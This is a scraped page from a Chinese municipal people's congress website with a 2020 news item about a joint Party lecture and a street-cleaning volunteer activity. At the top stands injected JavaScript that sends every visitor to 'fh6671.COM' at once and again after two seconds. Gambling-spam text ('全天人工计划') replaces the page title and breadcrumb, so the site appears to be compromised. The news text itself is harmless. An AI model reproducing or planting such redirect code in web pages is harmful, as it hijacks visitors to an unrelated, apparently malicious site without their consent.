function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

全天人工计划


欢迎您登录嘉峪关人大网站!
当前位置:全天人工计划  >>  新党的建设  >>  工作动态  
“互联共转”--同上党课  共美家园
来源: 市人大常委会机关党委      日期: 2020-08-13      作者: 徐晓颖      点击数:

“互联共转”--同上党课  共美家园

       8月10日,市人大常委会机关党支部与佳苑社区党委开展“互联共转”活动。

       市人大常委会一级巡视员王万平同志围绕“做好新时代党建工作”,为市人大常委会机关党员和佳苑社区党员讲了一堂精彩的专题党课。王主任从坚守“初心”跟党走,夯实基层党建的根基;秉持“匠心”强筋骨,牢固基层党建的框架;凝聚“民心”集能量,装饰基层党建的“内饰”三个方面对如何“做好新时代党建工作”进行了讲解。

       党课结束后,市人大常委会机关党员与佳苑社区党员走上街头,开展清理街面垃圾、铲除“小广告”、文明劝导等志愿活动,为“创城”尽自己的一份力量。